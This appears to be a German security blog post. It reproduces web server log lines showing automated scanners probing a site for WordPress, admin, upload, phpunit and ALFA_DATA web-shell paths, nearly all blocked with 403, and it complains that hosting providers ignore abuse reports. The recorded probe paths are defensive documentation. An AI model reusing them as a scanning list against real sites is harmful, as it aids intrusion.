185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
AS209854 – Cyberzone S.A. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:58 +0200] „GET /wp-includes/css/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:58 +0200] „GET /wp-includes/js/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:59 +0200] „GET /wp-includes/assets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:59 +0200] „GET /wp-includes/sitemaps/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:59 +0200] „GET /wp-content/plugins/erinyani/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:59 +0200] „GET /wp-includes/l10n/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:59 +0200] „GET /wp-content/uploads/2023/11/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:37:59 +0200] „GET /wp-includes/sodium_compat/lib/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:00 +0200] „GET /wp-includes/blocks/file/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:00 +0200] „GET /wp-includes/images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:00 +0200] „GET /wp-includes/block-bindings/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:00 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:00 +0200] „GET /wp-includes/widgets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:00 +0200] „GET /wp-admin/network/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:01 +0200] „GET /wp-admin/css/colors/sunrise/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:01 +0200] „GET /wp-includes/theme-compat/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:01 +0200] „GET /wp-content/plugins/ioxi/ioxi/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:01 +0200] „GET /wp-includes/id3/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:01 +0200] „GET /wp-includes/blocks/query/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:02 +0200] „GET /wp-includes/js/tinymce/langs/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:02 +0200] „GET /wp-admin/css/colors/ectoplasm/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:02 +0200] „GET /wp-includes/blocks/group/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:02 +0200] „GET /blog/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:02 +0200] „GET /wp-content/themes/twentytwentyfour/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:03 +0200] „GET /wp-includes/interactivity-api/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:03 +0200] „GET /wp-includes/wp-class.php/wp-content/themes/travelscape/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:03 +0200] „GET /wp-content/upgrade/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:03 +0200] „GET /wp-admin/js/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:03 +0200] „GET /assets/css/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:03 +0200] „GET /wp-includes/js/jquery/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:04 +0200] „GET /wp-includes/Requests/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:04 +0200] „GET /wp-admin/js/widgets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:04 +0200] „GET /wp-content/plugins/wp-file-manager/admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:04 +0200] „GET /wp-admin/js/widget/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:04 +0200] „GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:04 +0200] „GET /wp-content/uploads/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /wp-content/themes/tflow/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /wordpress/wp-admin/includes HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /wp-admin/js/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /ALFA_DATA/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /wp-admin/css/colors/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /wp-includes/css/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:05 +0200] „GET /wp-includes/ID3 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:06 +0200] „GET /wp-includes/blocks/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:06 +0200] „GET /wp-includes/certificates/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:06 +0200] „GET /wp-admin/images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:06 +0200] „GET /wp-admin/maint/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:06 +0200] „GET /wp-admin/meta/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:06 +0200] „GET /wp-admin/user/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:06 +0200] „GET /wp-content/uploads/ao_ccss/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /wp-content/uploads/2021/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /wp-content/plugins/elementor/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /wp-content/mu-plugins/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /upload/image/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /wordpress/wp-content/uploads/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /wordpress/wp-includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /blog/wp-includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:07 +0200] „GET /sites/default/files/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /admin/controller/extension/extension/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /admin/editor/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /admin/images/slider/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /admin/tmp/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /admin/uploads/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /Admin/uploads/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /admin/uploads/images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:08 +0200] „GET /administrator/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:09 +0200] „GET /ALFA_DATA/alfacgiapi/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:09 +0200] „GET /assets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:09 +0200] „GET /cgi-bin/ HTTP/1.0“ 403 262 „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:09 +0200] „GET /components/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:09 +0200] „GET /home/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:09 +0200] „GET /include/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:09 +0200] „GET /modules/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /modules/mod_simplefileuploadv1.3/elements/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /mt/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /site/wp-includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /tmps/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /wordpress/wp-admin/includes/wp-admin/js/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /wp-admin/css/colors/light/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /wp-admin/css/colors/midnight/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:10 +0200] „GET /wp-admin/css/colors/modern/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:11 +0200] „GET /wp-admin/css/colors/ocean/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:11 +0200] „GET /wp-content/languages/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:11 +0200] „GET /wp-content/uploads/2022/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:11 +0200] „GET /wp-content/uploads/2023/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:11 +0200] „GET /wp-content/uploads/2024/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:11 +0200] „GET /wp-includes/wp-includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:12 +0200] „GET /wp-includes/ID3/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:12 +0200] „GET /wp-includes/ID3/wp-includes/IXR/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:12 +0200] „GET /wp-includes/images/crystal/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:12 +0200] „GET /wp-includes/images/media/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:12 +0200] „GET /wp-includes/images/smilies/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:12 +0200] „GET /wp-includes/images/wlw/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:13 +0200] „GET /wp-includes/js/codemirror/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:13 +0200] „GET /wp-includes/js/plupload/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:13 +0200] „GET /wp-includes/PHPMailer/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:13 +0200] „GET /wp-includes/sitemaps/providers/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:13 +0200] „GET /cache-wordpress/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
82.26.162.27 website*x.com – – [24/Aug/2025:22:38:14 +0200] „GET /wp-content/ALFA_DATA/alfacgiapi/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“

Nun schauen wir mal, wie viele PROVIDER MAL WIEDER UNSERE ABUSE-MAIL IGNORIEREN!!! WIR BERICHTEN DANN NOCH DARÜBER!

NUN NOCH WAS VOM WOCHENENDE, BEGINNEND AB FREITAG, 15.08.25!

Schon seit längerer Zeit schreiben den Provider per Email an:

AS209605 UAB Host Baltic
admin@serveroffer.lt
Draugystes str. 19, 51230 Kaunas, LITHUANIA

Zu Beginn, absolute IGNORANZ, keinerlei Antwort oder andere Reaktion bzgl. unserer täglichen Abuse-Mails! Unglaublich, am Freitag den 15.08.25 kam dann nach längerer Zeit ENDLICH die erste Antwort, die allerdings sehr fragwürdig war:

„Thank you for reporting, network operator will check your report on Monday.“

SUPER, SICHERHEIT IST UNS EGAL, WIR GEHEN JETZT ERST MAL INS WOCHENENDE… so kommt das rüber!!!

Mittl. sind über unser eigenes Security-Tool alle Netzwerke von diesen mehr als fragwürdigen Provider auf SEHR VIELEN WEBSITES KOMPLETT GESPERRT!

